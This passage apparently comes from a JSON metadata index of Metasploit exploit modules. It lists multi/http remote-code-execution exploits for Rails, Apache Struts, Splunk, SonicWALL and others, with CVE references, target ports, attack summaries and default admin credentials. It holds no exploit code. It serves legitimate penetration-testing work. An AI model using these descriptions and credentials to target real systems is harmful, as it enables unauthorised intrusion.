"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_secret_deserialization": {
"name": "Ruby on Rails Known Secret Session Cookie Remote Code Execution",
"full_name": "exploit/multi/http/rails_secret_deserialization",
"rank": 600,
"disclosure_date": "2013-04-11",
"type": "exploit",
"author": [
"joernchen of Phenoelit <joernchen@phenoelit.de>"
],
"description": "This module implements Remote Command Execution on Ruby on Rails applications.\n Prerequisite is knowledge of the \"secret_token\" (Rails 2/3) or \"secret_key_base\"\n (Rails 4). The values for those can be usually found in the file\n \"RAILS_ROOT/config/initializers/secret_token.rb\". The module achieves RCE by\n deserialization of a crafted Ruby Object.",
"references": [
"CVE-2013-0156",
"URL-http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/multi/http/rails_secret_deserialization.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_secret_deserialization",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_web_console_v2_code_exec": {
"name": "Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution",
"full_name": "exploit/multi/http/rails_web_console_v2_code_exec",
"rank": 600,
"disclosure_date": "2015-06-16",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>",
"Ben Murphy <benmmurphy@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an IP whitelist bypass vulnerability in the developer\n web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also\n achieve code execution on Rails 4.2.x if the attack is launched from a\n whitelisted IP range.",
"references": [
"CVE-2015-3224",
"URL-http://openwall.com/lists/oss-security/2015/06/16/18",
"URL-https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ",
"URL-https://hackerone.com/reports/44513"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 3000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_web_console_v2_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_xml_yaml_code_exec": {
"name": "Ruby on Rails XML Processor YAML Deserialization Code Execution",
"full_name": "exploit/multi/http/rails_xml_yaml_code_exec",
"rank": 600,
"disclosure_date": "2013-01-07",
"type": "exploit",
"author": [
"charliesome",
"espes",
"lian",
"hdm <x@hdm.io>"
],
"description": "This module exploits a remote code execution vulnerability in the XML request\n processor of the Ruby on Rails application framework. This vulnerability allows\n an attacker to instantiate a remote object, which in turn can be used to execute\n any ruby code remotely in the context of the application.\n\n This module has been tested across multiple versions of RoR 3.x and RoR 2.x\n\n The technique used by this module requires the target to be running a fairly recent\n version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be\n exploitable using the init_with() method, but this has not been demonstrated.",
"references": [
"CVE-2013-0156",
"OSVDB-89026",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_xml_yaml_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rocket_servergraph_file_requestor_rce": {
"name": "Rocket Servergraph Admin Center fileRequestor Remote Code Execution",
"full_name": "exploit/multi/http/rocket_servergraph_file_requestor_rce",
"rank": 500,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses several directory traversal flaws in Rocket Servergraph Admin\n Center for Tivoli Storage Manager. The issues exist in the fileRequestor servlet,\n allowing a remote attacker to write arbitrary files and execute commands with\n administrative privileges. This module has been tested successfully on Rocket\n ServerGraph 1.2 over Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu\n 12.04 64 bits.",
"references": [
"CVE-2014-3914",
"ZDI-14-161",
"ZDI-14-162",
"BID-67779"
],
"platform": "Linux,Unix,Windows",
"arch": "x86, x64, cmd",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux (Native Payload)",
"Linux (CMD Payload)",
"Windows / VB Script",
"Windows CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/rocket_servergraph_file_requestor_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sflog_upload_exec": {
"name": "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/sflog_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-06",
"type": "exploit",
"author": [
"dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has\n a default admin credential of \"admin:secret\", which can be abused to access\n administrative features such as blogs management. Through the management\n interface, we can upload a backdoor that's accessible by any remote user, and then\n gain arbitrary code execution.",
"references": [
"OSVDB-83767",
"EDB-19626"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/sflog_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/sflog_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/simple_backdoors_exec": {
"name": "Simple Backdoor Shell Remote Code Execution",
"full_name": "exploit/multi/http/simple_backdoors_exec",
"rank": 600,
"disclosure_date": "2015-09-08",
"type": "exploit",
"author": [
"Jay Turla <@shipcod3>"
],
"description": "This module exploits unauthenticated simple web backdoor shells by leveraging the\n common backdoor shell's vulnerable parameter to execute commands. The SecLists project of\n Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells\n which is categorized under Payloads.",
"references": [
"URL-http://resources.infosecinstitute.com/checking-out-backdoor-shells/",
"URL-https://github.com/danielmiessler/SecLists/tree/master/Payloads"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"backdoor / Unix",
"backdoor / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/simple_backdoors_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/simple_backdoors_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sit_file_upload": {
"name": "Support Incident Tracker Remote Command Execution",
"full_name": "exploit/multi/http/sit_file_upload",
"rank": 600,
"disclosure_date": "2011-11-10",
"type": "exploit",
"author": [
"Secunia Research",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module combines two separate issues within Support Incident Tracker (<= 3.65)\n application to upload arbitrary data and thus execute a shell. The two issues exist\n in ftp_upload_file.php.\n The first vulnerability exposes the upload dir used to store attachments.\n The second vulnerability allows arbitrary file upload since there is no\n validation function to prevent from uploading any file type.\n Authentication is required to exploit both vulnerabilities.",
"references": [
"CVE-2011-3829",
"CVE-2011-3833",
"OSVDB-76999",
"OSVDB-77003",
"URL-http://secunia.com/secunia_research/2011-75/",
"URL-http://secunia.com/secunia_research/2011-79/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/sit_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sit_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/snortreport_exec": {
"name": "Snortreport nmap.php/nbtscan.php Remote Command Execution",
"full_name": "exploit/multi/http/snortreport_exec",
"rank": 600,
"disclosure_date": "2011-09-19",
"type": "exploit",
"author": [
"Paul Rascagneres"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n nmap.php and nbtscan.php scripts.",
"references": [
"OSVDB-67739",
"URL-http://www.symmetrixtech.com/articles/news-016.html"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/snortreport_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/snortreport_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/solarwinds_store_manager_auth_filter": {
"name": "SolarWinds Storage Manager Authentication Bypass",
"full_name": "exploit/multi/http/solarwinds_store_manager_auth_filter",
"rank": 600,
"disclosure_date": "2014-08-19",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.\n The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication\n with specially crafted URLs. After bypassing authentication, is possible to use a file\n upload function to achieve remote code execution. This module has been tested successfully\n in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and\n Linux 64 bits operating systems.",
"references": [
"CVE-2015-5371",
"ZDI-14-299"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 9000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Solarwinds Store Manager <= 5.7.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb",
"is_install_path": true,
"ref_name": "multi/http/solarwinds_store_manager_auth_filter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sonicwall_gms_upload": {
"name": "SonicWALL GMS 6 Arbitrary File Upload",
"full_name": "exploit/multi/http/sonicwall_gms_upload",
"rank": 600,
"disclosure_date": "2012-01-17",
"type": "exploit",
"author": [
"Nikolas Sotiriu",
"Redsadic <julian.vilas@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in SonicWALL GMS. It exploits two\n vulnerabilities in order to get its objective. An authentication bypass in the\n Web Administration interface allows to abuse the \"appliance\" application and upload\n an arbitrary payload embedded in a JSP. The module has been tested successfully on\n SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual\n Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run\n successfully while testing, shell payload has been used.",
"references": [
"CVE-2013-1359",
"OSVDB-89347",
"BID-57445",
"EDB-24204"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SonicWALL GMS 6.0 Viewpoint / Java Universal",
"SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2",
"SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/sonicwall_gms_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sonicwall_gms_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sonicwall_scrutinizer_methoddetail_sqli": {
"name": "Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",
"full_name": "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli",
"rank": 600,
"disclosure_date": "2014-07-24",
"type": "exploit",
"author": [
"bperry",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail\n parameter in exporters.php allows an attacker to write arbitrary files to the file system\n with an SQL Injection attack, and gain remote code execution under the context of SYSTEM\n for Windows, or as Apache for Linux.\n\n Authentication is required to exploit this vulnerability, but this module uses\n the default admin:admin credential.",
"references": [
"CVE-2014-4977",
"BID-68495",
"URL-https://seclists.org/fulldisclosure/2014/Jul/44",
"URL-https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Dell SonicWALL Scrutinizer 11.01 on Windows",
"Dell SonicWALL Scrutinizer 11.01 Linux Appliance"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/sonicwall_scrutinizer_methoddetail_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/sonicwall_scrutinizer_methoddetail_sqli",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/splunk_mappy_exec": {
"name": "Splunk Search Remote Code Execution",
"full_name": "exploit/multi/http/splunk_mappy_exec",
"rank": 600,
"disclosure_date": "2011-12-12",
"type": "exploit",
"author": [
"Gary O'Leary-Steele",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a command execution vulnerability in the\n web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists\n in the 'mappy' search command which allows attackers to run Python code.\n To exploit this vulnerability, a valid Splunk user with the admin\n role is required. By default, this module uses the credential of \"admin:changeme\",\n the default Administrator credential for Splunk. Note that the Splunk web interface\n runs as SYSTEM on Windows and as root on Linux by default.",
"references": [
"OSVDB-77695",
"BID-51061",
"CVE-2011-4642",
"URL-http://www.splunk.com/view/SP-CAAAGMM",
"URL-http://www.sec-1.com/blog/?p=233"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/splunk_mappy_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/splunk_mappy_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/splunk_upload_app_exec": {
"name": "Splunk Custom App Remote Code Execution",
"full_name": "exploit/multi/http/splunk_upload_app_exec",
"rank": 400,
"disclosure_date": "2012-09-27",
"type": "exploit",
"author": [
"marcwickenden",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Gary Blosser",
"Matteo Malvica"
],
"description": "This module exploits a feature of Splunk whereby a custom application can be\n uploaded through the web based interface. Through the 'script' search command a\n user can call commands defined in their custom application which includes arbitrary\n perl or python code. To abuse this behavior, a valid Splunk user with the admin\n role is required. By default, this module uses the credential of \"admin:changeme\",\n the default Administrator credential for Splunk. Note that the Splunk web interface\n runs as SYSTEM on Windows, or as root on Linux by default. This module has been\n tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4.\n Version 7.2.4 has been tested successfully against OSX as well",
"references": [
"URL-http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html",
"URL-http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html",
"URL-http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Splunk >= 7.2.4 / Linux",
"Splunk >= 7.2.4 / Windows",
"Splunk >= 7.2.4 / OSX",
"Splunk >= 5.0.1 / Linux",
"Splunk >= 5.0.1 / Windows"
],
"mod_time": "2019-03-19 15:28:24 +0000",
"path": "/modules/exploits/multi/http/splunk_upload_app_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/splunk_upload_app_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/spree_search_exec": {
"name": "Spreecommerce 0.60.1 Arbitrary Command Execution",
"full_name": "exploit/multi/http/spree_search_exec",
"rank": 600,
"disclosure_date": "2011-10-05",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Spreecommerce search. Unvalidated input is called via the\n Ruby send method allowing command execution.",
"references": [
"OSVDB-76011",
"URL-http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/spree_search_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/spree_search_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/spree_searchlogic_exec": {
"name": "Spreecommerce Arbitrary Command Execution",
"full_name": "exploit/multi/http/spree_searchlogic_exec",
"rank": 600,
"disclosure_date": "2011-04-19",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n the Spreecommerce API searchlogic for versions 0.50.0 and earlier.\n Unvalidated input is called via the Ruby send method allowing command\n execution.",
"references": [
"OSVDB-71900",
"URL-http://www.spreecommerce.com/blog/2011/04/19/security-fixes/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/spree_searchlogic_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/spree_searchlogic_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_code_exec_showcase": {
"name": "Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution",
"full_name": "exploit/multi/http/struts2_code_exec_showcase",
"rank": 600,
"disclosure_date": "2017-07-07",
"type": "exploit",
"author": [
"icez <ic3z at qq dot com>",
"Nixawk",
"xfer0"
],
"description": "This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value.",
"references": [
"CVE-2017-9791",
"BID-99484",
"EDB-42324",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-048"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2018-05-16 05:39:17 +0000",
"path": "/modules/exploits/multi/http/struts2_code_exec_showcase.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_code_exec_showcase",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_content_type_ognl": {
"name": "Apache Struts Jakarta Multipart Parser OGNL Injection",
"full_name": "exploit/multi/http/struts2_content_type_ognl",
"rank": 600,
"disclosure_date": "2017-03-07",
"type": "exploit",
"author": [
"Nike.Zheng",
"Nixawk",
"Chorder",
"egypt <egypt@metasploit.com>",
"Jeffrey Martin"
],
"description": "This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed\n via http Content-Type header.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.",
"references": [
"CVE-2017-5638",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-045"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/struts2_content_type_ognl.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_content_type_ognl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_namespace_ognl": {
"name": "Apache Struts 2 Namespace Redirect OGNL Injection",
"full_name": "exploit/multi/http/struts2_namespace_ognl",
"rank": 600,
"disclosure_date": "2018-08-22",
"type": "exploit",
"author": [
"Man Yue Mo",
"hook-s3c",
"asoto-r7",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\n via an endpoint that makes use of a redirect action.\n\n Note that this exploit is dependant on the version of Tomcat running on\n the target. Versions of Tomcat starting with 7.0.88 currently don't\n support payloads larger than ~7.5kb. Windows Meterpreter sessions on\n Tomcat >=7.0.88 are currently not supported.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.",
"references": [
"CVE-2018-11776",
"URL-https://lgtm.com/blog/apache_struts_CVE-2018-11776",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-057",
"URL-https://github.com/hook-s3c/CVE-2018-11776-Python-PoC"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic detection",
"Windows",
"Linux"
],
"mod_time": "2018-12-14 13:08:50 +0000",
"path": "/modules/exploits/multi/http/struts2_namespace_ognl.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_namespace_ognl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_rest_xstream": {
"name": "Apache Struts 2 REST Plugin XStream RCE",
"full_name": "exploit/multi/http/struts2_rest_xstream",
"rank": 600,
"disclosure_date": "2017-09-05",
"type": "exploit",
"author": [
"Man Yue Mo",
"wvu <wvu@metasploit.com>"
],
"description": "Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12,\n using the REST plugin, are vulnerable to a Java deserialization attack\n in the XStream library.",
"references": [
"CVE-2017-9805",
"URL-https://struts.apache.org/docs/s2-052.html",
"URL-https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement",
"URL-https://github.com/mbechler/marshalsec"
],
"platform": "Linux,Python,Unix,Windows",
"arch": "cmd, python, x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)",
"Windows (In-Memory)",
"Python (In-Memory)",
"PowerShell (In-Memory)",
"Linux (Dropper)",
"Windows (Dropper)"
],
"mod_time": "2019-02-25 11:13:41 +0000",
"path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_rest_xstream",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec": {
"name": "Apache Struts Remote Command Execution",
"full_name": "exploit/multi/http/struts_code_exec",
"rank": 400,
"disclosure_date": "2010-07-13",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Meder Kydyraliev"
],
"description": "This module exploits a remote command execution vulnerability in\n Apache Struts versions < 2.2.0. This issue is caused by a failure to properly\n handle unicode characters in OGNL extensive expressions passed to the web server.\n\n By sending a specially crafted request to the Struts application it is possible to\n bypass the \"#\" restriction on ParameterInterceptors by using OGNL context variables.\n Bypassing this restriction allows for the execution of arbitrary Java code.",
"references": [
"CVE-2010-1870",
"OSVDB-66280",
"EDB-14360"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec_classloader": {
"name": "Apache Struts ClassLoader Manipulation Remote Code Execution",
"full_name": "exploit/multi/http/struts_code_exec_classloader",
"rank": 0,
"disclosure_date": "2014-03-06",
"type": "exploit",
"author": [
"Mark Thomas",
"Przemyslaw Celej",
"Redsadic <julian.vilas@gmail.com>",
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts versions\n 1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related with\n the ActionForm bean population mechanism while in case of Struts 2.x the vulnerability is due\n to the ParametersInterceptor. Both allow access to 'class' parameter that is directly\n mapped to getClass() method and allows ClassLoader manipulation. As a result, this can\n allow remote attackers to execute arbitrary Java code via crafted parameters.",
"references": [
"CVE-2014-0094",
"CVE-2014-0112",
"CVE-2014-0114",
"URL-http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/",
"URL-http://struts.apache.org/release/2.3.x/docs/s2-020.html",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204",
"URL-https://github.com/rgielen/struts1filter/tree/develop"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java",
"Linux",
"Windows",
"Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)"
],
"mod_time": "2019-01-29 11:08:14 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec_classloader.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_code_exec_classloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec_exception_delegator": {
"name": "Apache Struts Remote Command Execution",
"full_name": "exploit/multi/http/struts_code_exec_exception_delegator",
"rank": 600,
"disclosure_date": "2012-01-06",
"type": "exploit",
"author": [
"Johannes Dahse",
"Andreas Nusser",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"mihi"
],
"description": "This module exploits a remote command execution vulnerability in\n Apache Struts versions < 2.2.1.1. This issue is caused because the\n ExceptionDelegator interprets parameter values as OGNL expressions\n during certain exception handling for mismatched data types of properties,\n which allows remote attackers to execute arbitrary Java code via a\n crafted parameter.",
"references": [
"CVE-2012-0391",
"OSVDB-78277",
"EDB-18329"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_code_exec_exception_delegator",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec_parameters": {
"name": "Apache Struts ParametersInterceptor Remote Code Execution",
"full_name": "exploit/multi/http/struts_code_exec_parameters",
"rank": 600,
"disclosure_date": "2011-10-01",
"type": "exploit",
"author": [
"Meder Kydyraliev",
"Richard Hicks <scriptmonkey.blog@gmail.com>",
"mihi",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows\n for the use of parentheses which in turn allows it to interpret parameter values as\n OGNL expressions during certain exception handling for mismatched data types of\n properties which allows remote attackers to execute arbitrary Java code via a\n crafted parameter.",
"references": [
"CVE-2011-3923",
"OSVDB-78501",
"URL-http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-009"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2018-05-16 06:15:40 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec_parameters.rb",
